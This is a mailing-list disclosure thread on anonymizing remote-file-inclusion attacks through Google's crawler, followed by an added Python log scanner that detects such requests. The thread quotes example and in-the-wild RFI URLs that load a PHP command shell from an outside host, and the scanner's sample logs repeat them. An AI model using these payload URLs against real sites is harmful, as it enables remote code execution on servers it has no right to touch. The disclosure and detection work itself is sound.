Date: Sat, 25 Nov 2006 01:01:54 -0500
From: "Dude VanWinkle" <dudevanwinkle@...il.com>
To: endrazine <endrazine@...il.com>
Cc: full-disclosure@...ts.grok.org.uk, Gadi Evron <ge@...uxbox.org>
Subject: Re: Anonymizing RFI Attacks Through Google

On 11/25/06, endrazine <endrazine@...il.com> wrote:
> Hi Gadi,
>
> I beg your pardon, but either I missed the purpose of this post, or you
> discovered hot water: this process of attack is a mere waste of time if
> one only reaches anonymity: in order to give google this new url to crawl,
> you'd have to either create a web page that points to this very page, or
> enter the url in the google database directly using their form. None of
> those two options are safer than attacking the website directly (google
> might very well log your actions), so what's the point?
>

a lot of people are used to seeing google spider tracks in their logs.
anonymizing your attack via google may make the admin investigating the
attack think that a malfunctioning web bot was responsible for the attack,
or they may skim over the entire incident accidentally.

JMO

-JP<who thinks unabashed douchebaggery is a sign of character, not weakness thereof>

> Also, most features in the web (like free emails, online scanning,
> pinging, lookup, etc., most applets allowing you to use irc, ftp or other
> services...) can be used to anonymise (or at least "proxify") attacks.
> So why focus on google and search engines specifically?
>
> To be honest, my biggest issue with this post is its lack of technicality:
> no offense, but I can hardly see anything that isn't public knowledge in
> this post.
>
> Regards,
>
> endrazine-
>
> Gadi Evron wrote:
> > Noam Rathaus on using Google to anonymize attacks on websites:
> > http://blogs.securiteam.com/index.php/archives/746
> >
> > Anonymizing RFI Attacks Through Google
> > noam - November 23, 2006 on 12:03 pm
> >
> > Google can be utilized to hack into websites - actively exploiting them
> > (not information gathering by the use of "Google hacking", although that
> > is how most of the sites vulnerable to RFI attacks are found).
> >
> > By placing a URL on any web page, Google will find it, visit it and then
> > index it. With this mechanism, it is possible to anonymize attacks on
> > third party web sites through Google by the use of its crawler.
> >
> > PoC -
> > A malicious web page is constructed by an attacker, containing a URL built
> > like so:
> > 1. Third party site URI to attack.
> > 2. File inclusion exploit.
> > 3. Second URI containing a malicious PHP shell.
> >
> > Example URL:
> > http://victim-site/RFI-exploit?http://URI-with-malicious-code.php
> >
> > Google will harvest this URL, visit the site using its crawler and index
> > it. Meaning accessing the target site with the URL it was provided and
> > exploiting it unwittingly for whoever planted it. It's a feature, not a
> > bug.
> >
> > This is currently exploited in the wild. For example, try searching Google
> > for:
> > inurl:cmd.gif
> >
> > And note, as an example:
> > www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd
> > Which is no longer vulnerable.
> >
> > Why use a botnet when one can abuse the Google crawler, which is allowed
> > on most web sites?
> >
> > Notes:
> > 1. This attack was verified on Google, but there is no reason why it
> > should not work with other search engines, web crawlers and web spiders.
> > 2. File inclusions seem to tie in well with this attack anonymizer, but
> > there is no reason why other attack types can't be used in a similar
> > fashion.
> > 3. The feature might also be used to anonymize communication, as a covert
> > channel.
> >
> > Noam Rathaus.
> > (with thanks to Gadi Evron and Lev Toger)
> >

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
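The reply above makes the defensive point of the thread: crawler tracks in an access log are so familiar that an RFI attempt delivered by a crawler gets skimmed past. The consequence is that the detection has to key on the shape of the request, not on the User-Agent. The following is an added example, not code from the thread or from the SecuriTeam post: it parses Apache combined-format log lines and flags any query-string name or value that is itself an absolute URL, percent-decoding a second time and stripping whitespace so that the obfuscated "http:/%20/" form quoted in the post is caught, and it records separately whether the User-Agent claims to be a crawler. The log lines are constructed (RFC 5737 documentation addresses; the hostnames are the ones quoted in the post), and the crawler and "disguised extension" patterns are my own assumptions, not anything the thread specifies.

```python
"""Flag remote-file-inclusion (RFI) attempts in Apache combined-format access
logs regardless of who the User-Agent claims to be.  Added example with
constructed log lines; not data or code from the original thread."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A query-string name or value that is itself an absolute URL is the RFI signature.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://[^/?#\s]+', re.IGNORECASE)
# Shells are often hosted under an innocent-looking extension ("cmd.gif" in the post).
# Assumed list, extend as needed.
DISGUISED_RE = re.compile(r'\.(?:gif|jpe?g|png|txt)(?:\?|$)', re.IGNORECASE)
# Assumed set of crawler User-Agent markers; only used to annotate, never to filter.
CRAWLER_RE = re.compile(r'googlebot|bingbot|slurp|yandex', re.IGNORECASE)


def normalize(value: str) -> str:
    """Percent-decode once more (parse_qsl already decoded once, so this defeats
    double encoding) and drop whitespace, turning "http:/ /host" into "http://host"."""
    return re.sub(r'\s+', '', unquote(value))


def find_remote_includes(target: str) -> list:
    """Return the absolute URLs smuggled into the query string of a request target.
    Both names and values are checked: "?http://evil/x.php" parses as a bare name."""
    found = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for candidate in (normalize(name), normalize(value)):
            if REMOTE_RE.match(candidate):
                found.append(candidate)
                break
    return found


def analyze_line(line: str):
    """Parse one log line; return a finding dict for RFI-shaped requests, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    includes = find_remote_includes(m['target'])
    if not includes:
        return None
    return {
        'ip': m['ip'],
        'status': m['status'],
        'includes': includes,
        'disguised': any(DISGUISED_RE.search(u) for u in includes),
        # The User-Agent is attacker-controlled and, per the thread, a real crawler
        # can be pointed at the exploit URL, so this is context for the analyst,
        # not a reason to drop the finding.
        'claims_crawler': bool(CRAWLER_RE.search(m['ua'])),
    }


def scan(log_text: str) -> list:
    """Run analyze_line over every line and collect the findings."""
    return [f for f in map(analyze_line, log_text.splitlines()) if f]


# Constructed sample log (RFC 5737 addresses).  The first request mirrors the
# in-the-wild URL quoted in the post, arriving under a crawler User-Agent.
SAMPLE_LOG = """\
192.0.2.10 - - [25/Nov/2006:01:01:54 -0500] "GET /index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.0.2.11 - - [25/Nov/2006:01:02:10 -0500] "GET /index.php?s=about HTTP/1.1" 200 3210 "-" "Mozilla/4.0"
192.0.2.12 - - [25/Nov/2006:01:03:44 -0500] "GET /RFI-exploit?http%3A%2F%2FURI-with-malicious-code.php HTTP/1.0" 500 0 "-" "curl/7.15"
"""

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The design choice worth noting is that claims_crawler is reported but never used to suppress a finding: a request whose parameter points at a remote file is an inclusion attempt whoever sent it, and the crawler annotation only tells the analyst that the log entry is the kind that tends to get skimmed. A 200 response with a non-trivial byte count on such a request, as in the first sample line, is the case to escalate first.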